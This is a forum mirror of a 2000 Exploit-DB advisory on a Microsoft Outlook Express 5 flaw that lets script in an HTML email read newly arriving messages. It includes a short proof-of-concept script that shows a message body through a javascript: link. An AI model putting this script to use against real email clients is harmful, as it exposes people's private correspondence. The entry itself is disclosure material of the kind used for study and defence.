- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 19738
- Проверка EDB
-
- Пройдено
- Автор
- GEORGI GUNINSKI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2000-0653 cve-2000-0105
- Дата публикации
- 2000-02-01
Microsoft Outlook Express 5 - JavaScript Email Access
Код:
source: https://www.securityfocus.com/bid/962/info
Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run.
Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>- Источник
- www.exploit-db.com
